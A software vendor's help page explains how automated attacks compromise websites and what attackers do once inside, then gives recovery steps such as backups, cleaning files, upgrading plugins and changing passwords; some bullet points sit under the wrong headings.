How to Restore Hacked Sites
There are no known security vulnerabilities in our software, but website hacks are becoming more and more common
so we've created this page to help you understand the issue, and to provide tips on restoring a hacked site.
*Note: For the purposes of this document we use the term "hacker" to refer to a malicious user who is intent on gaining illegal access to a computer system
or network by bypassing or breaking the security system. The term can also be used in a positive context to refer to hobbyists or the programmer subculture
that includes the pioneers of the internet. For more information see:
How hackers get in
Almost all website hacks these days are automated - rather than sitting in front of a computer, hackers* use
automatic scripts to scan thousands of websites an hour for known security vulnerabilities and weaknesses.
The top ways a hacker compromises a website are:
- Exploiting known vulnerabilities in older versions of popular web scripts such as: WordPress, Email Forms, Image Galleries, etc
Guessing easy passwords. Vulnerable passwords are usually short, simple, common, or dictionary words.
- Open-source and free scripts are very common and installed on millions of servers, making them an easy target for hackers.
- These scripts usually have common urls and filenames (such as wp-login.php) that hackers can scan for.
- Even if the script isn't used, or was installed by default by the host, it can still be vulnerable.
Compromising another account on a shared-hosting server and using it to gain access other sites on the server, including yours.
- Automated scripts can test thousands of passwords a minute. (See Wikipedia: Brute-force Attack)
- This shouldn't be possible if your web host has applied all the latest security patches and updates.
- If you are repeatedly hacked and you believe it's related to the host there's nothing you can do but switch hosts (or servers).
Once a hacker gains access to your site through one of the methods described above, they may then have all the same security rights
as you do when you connect with FTP, or as PHP does (read/write files and the database, install programs, send emails,
etc), and in some cases may be able to gain full control of the server with administrator rights.
What they do once they're in
Typically, once they have control of a website (and remember, most of this is done automatically) they will do the following:
Hackers will want to use your server for as long as possible without being discovered, so often spam-links
will go undetected for some time and will only appear on pages you are unlikely to see, such as "404 Not Found"
pages or pages that aren't linked to from search engines.
- Install additional programs and backdoors to make it easier to control your server.
- Use your server to send bulk unsolicited email (spam).
- Use your server to attack other servers and websites and gain control of them.
- Redirect incoming links from Google and search engines to other websites.
- Display spam links on your 404 "Not Found" pages.
- Insert links or spam into your pages.
- Use the hijacked website to attempt to gain further access to your network or your web host's network.
How it can affect your site
Even if the changes are hard to detect or minimal, they can have a very negative effect on your traffic,
website revenue, and reputation. Some examples include:
- You can lose traffic (search engines and anti-virus programs may block your website).
- You can get banned by Google if your site is hosting malware.
- You can get banned by email gateways if your site is sending spam.
- You can lose customers or reputation if website visitors see anti-virus warnings, viagra links, pornography, malware, etc.
- Your search engine ranking can be reduced or you may be removed from search engines altogether.
- Your site may go slower or have decreased performance if the server resources are being redirected for other purposes.
- You may exceed site quotas for bandwidth and CPU time and/or get charged with overage fees.
Recovering/Restoring your website
Recovering from a hacking attack takes time and effort, use the following tips as a starting point:
- Scan your local computer
Backup the hacked site
- Install an anti-virus program if you don't have one. Try Microsoft Security Essentials for Windows and ClamXav for Macs.
- Run a full anti-virus/malware scan. Sometimes exploits can be introduced from a compromised local PC.
Contact your web host
- Backup MySQL databases and any website files to your computer, labelling them as a hacked backup.
- This will allow you to restore to the previous version if your cleaning or upgrade attempts fail.
Restore from backup or clean infected files
- Find out if other sites have been hacked (especially if you are using shared-hosting).
- Ask if they have any backups of your database or website files.
- Find out if they have any tips or services for restoring hacked sites.
Remove unneeded applications, files, or plugins
- If you have a clean backup of your files that has not been hacked, consider restoring to this backup.
- Failing that, you will need to manually review and compare all files to find exploited or modified code.
- One method to quickly replace program files is to upgrade or re-install web applications.
Upgrade all remaining applications, and plugins
- If you don't think you need an application or file, remove it.
- Make sure your files were backed up in an earlier step so you can restore any file that has been accidentally or incorrectly removed.
Change all your passwords
- Make a list of all the applications and plugins on your site and their current versions.
- For each application or plugin, download the latest version and install it.
- Make a list of all your passwords.
- Change all your passwords for FTP, Email, Plesk, MySQL, etc.
- Review the reference links at the bottom of the page.
- Do some googling and online reading to find out more about best practices for restoring after a hack.
- If you continue to have security problems consider hiring a security professional to assist you.